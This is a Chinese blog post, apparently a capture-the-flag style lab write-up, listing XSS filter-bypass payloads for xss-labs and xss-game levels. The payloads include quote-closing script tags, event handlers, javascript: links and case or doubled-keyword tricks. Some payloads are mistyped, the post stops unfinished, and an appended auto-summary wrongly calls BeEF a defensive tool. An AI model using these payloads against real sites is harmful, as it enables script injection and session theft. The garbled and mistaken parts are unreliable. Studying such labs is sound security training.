xss漏洞总结【插入位置】

明天再更新:

使用靶场:xss-labs、https://xss-game.appspot.com

XSS可能出现的地方:

  • url的地址栏:
  • 搜索框:
  • 留言板:

绕过方法:

  • 换标签<a href >
  • 闭合双引号、
  • 大小写绕过、
  • 双写关键字、
  • 构造事件(onclick).

靶场:xss-labs

位置一:URL里

在这里插入图片描述

位置二:搜索框中

html属性中作为值;绕过方法:闭合。

"><script>alert(1)</script>

在这里插入图片描述

位置三:搜索框中

如下图:'<script>alert(1)</script>' 其中单引号被替换成双引号,特殊字符也被实体编码了。

特殊字符被过滤,但不对单引号转义,因此利用单引号闭合构造事件

'οnclick='alert(1)''

或者

'οnfοcus=alert('xss') >//

在这里插入图片描述

位置四:搜索框
尖括号被过滤了,所有考虑事件触发,用双引号闭合value属性。

"οnclick='alert(1)'"  或者:"οnfοcus='alert(1)'"

"οnfοcus=javascript:alert('xss') " // 或者"οnclick=javascript:alert('xss') " //

在这里插入图片描述

在这里插入图片描述

位置五:
特殊字符被替代,换标签继续:

"><a href=jiavascript:alert('1')>2</a>//
">:闭合前面标签。
<a href=javascript:alert('1')>2</a>:点击数字2,跳转到href执行弹窗命令。
//:注释后面的“>。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

位置六:搜索框
关键字过滤了:href、script、on
大小写绕过:"oNclick='alert(1)'" 使用双引号进行闭合。

"oNclick='alert(1)'"
或者"Onclick=javascript:alert('xss') " //
或者 "> <a HrEf=javascript:alert('xss') > xss</a> //

位置七:搜索框
关键字被删除,尝试双写

"onοnclick=javascript:alert('xss') " //

在这里插入图片描述

靶场:https://xss-game.appspot.com/

第一关:地址栏中:<script>alert(1)</script>

也可以使用反斜号绕过,遇到“()”被屏蔽时可以使用这种方式。${String}这是ES6新增的模板字符串方法新特性。

第二关:发布帖子:
<a href=javascript:alert(1)>xss</a>

第三关:

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
根据引用\[1\]和引用\[2\]的内容,XSS漏洞是一种发生在前端页面的漏洞,主要是由于Web应用程序对输入和输出没有做合适的处理,导致恶意的JavaScript脚本被插入到HTML页面中,当被攻击者浏览页面时,这些脚本会被执行,从而实现攻击者的恶意目的,如获取cookie、监听键盘、窃取密码等。XSS漏洞可以分为反射型XSS、存储型XSS和DOM型XSS等不同类型。其中,反射型XSS是指恶意脚本通过URL参数传递给服务器,服务器将恶意脚本返回给浏览器执行;存储型XSS是指恶意脚本被存储在服务器端,当用户访问包含恶意脚本的页面时,脚本会被执行;DOM型XSS是指恶意脚本通过修改DOM元素来实现攻击。为了防护XSS漏洞,可以使用一些工具,如XSS平台beef,它可以帮助检测和防御XSS漏洞。引用\[3\]提供了更多关于XSS漏洞的详细信息。 #### 引用[.reference_title] - *1* *3* [web漏洞-xss漏洞](https://blog.csdn.net/qq_44312640/article/details/127791065)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [XSS漏洞详解](https://blog.csdn.net/m0_56822024/article/details/125692783)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值